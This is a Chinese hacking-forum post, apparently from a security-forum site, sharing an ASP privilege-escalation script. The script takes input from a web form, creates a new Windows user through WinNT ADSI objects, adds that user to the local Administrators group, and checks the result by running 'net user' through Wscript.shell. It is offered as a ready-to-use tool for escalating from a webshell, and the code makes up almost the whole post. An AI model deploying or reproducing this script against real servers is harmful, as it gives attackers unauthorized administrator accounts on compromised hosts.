最近看过此主题的会员

返回列表 发帖
用ASP代码添加超级用户——asp提权时用
在user权限下成功添加Administrators组的用户反正代码是对的,但是很少能成功,具体的看运气了。。
  x# u5 y9 Y! F# c- g1 J
[/quote]7 w* W% ?# @  e5 r5 f; t
[quote]<head>.network对象脚本权限提升漏洞利用工具</head><form action="useradd.asp" method=post>用户:<input name="username" type="text" value="kevin1986"><br>密码:<input name="passwd" type="password"><br><input type="submit" Value="添 加"></form>

  P8 w* h- B0 _# `2 }
<%@codepage=936%><%on error resume nextif request.servervariables("REMOTE_ADDR")<>"127.0.0.1" thenresponse.write "iP !s n0T RiGHt"elseif request("username")<>"" thenusername=request("username")passwd=request("passwd")Response.Expires=0Session.TimeOut=50Server.ScriptTimeout=3000set lp=Server.CreateObject("WSCRIPT.NETWORK")oz="WinNT://"&amp;lp.ComputerNameSet ob=GetObject(oz)Set oe=GetObject(oz&amp;"/Administrators,group")Set od=ob.Create("user",username)od.SetPassword passwdod.SetInfooe.Add oz&amp;"/"&amp;usernameif err thenresponse.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"elseif instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&amp;username.stdout.readall),"上次登录")>0 thenresponse.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"elseResponse.write "OMG!"&amp;username&amp;"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"end ifend ifelseresponse.write "请输入输入用户名"end ifend if%>
8 T; z8 y5 l3 o, v

( u4 }; a# l8 \" C' r
( A- E4 ^" N, ]  |8 D! _
# ^3 w, P% f3 R5 N
" K( R( _: z; P) ^3 _" s$ C8 {$ N* d. t) o0 W/ ]
" Y% l1 i2 l) S5 g, w* M8 v
. w  h5 Z0 g  v  P8 U
; ~" Y; t3 P7 T3 g4 t$ J" c+ P

( N* y0 S( R- r2 H! f( O
* s, }' q+ u/ Y- p; I- V5 C3 @, Z! k+ b; I. f5 t! g
! @+ ?1 Z  j" t' w* _: @( J" ?

1 P6 C+ X0 i4 ?- j& L6 x
4 y, H+ i2 {  K4 [  O/ d# Y2 I5 s
2 \( ]1 c# G, ?+ r7 X9 O' P. Z3 i
* [& [% f# ]# }& G0 ~! |, G# t

- q' E1 K) i! J( q! O1 \公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

非安全中国网10周年T恤申请及相关事宜补充说明

非安全中国网10周年T恤申请及相关事宜通告

庆祝非安全中国网创办10周年纪念活动 t恤设计进度

罗斯论坛曝Gmail五百万密码泄露

整理网站0day

开放免费的DNS

好基友的一次完美信息追踪!

我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

dz x3后台拿shell+webshell隐藏

基于各种原因,非安全中国网正进行秘密计划敬请期待

TOP

返回列表